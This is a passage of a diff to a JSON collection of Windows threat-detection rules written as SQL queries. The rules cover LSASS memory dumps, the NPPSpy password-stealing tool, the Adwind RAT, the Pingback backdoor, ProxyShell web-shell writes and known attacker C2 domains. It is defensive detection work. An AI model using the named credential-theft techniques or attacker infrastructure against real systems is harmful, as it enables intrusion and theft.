'%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' 
OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR 
Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_wmi_persistence.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell creating a binary executable or script file.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "Suspicious 
MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - 
"attack.t1482" + "attack.initial_access", + "attack.t1566.001" + ], + "falsepositives": [ + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR 
SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_ldap_recon.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing Publisher documents", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".pub\" files from those locations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft 
Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE 
'%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE 
'\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - 
], + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "status": "experimental", + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 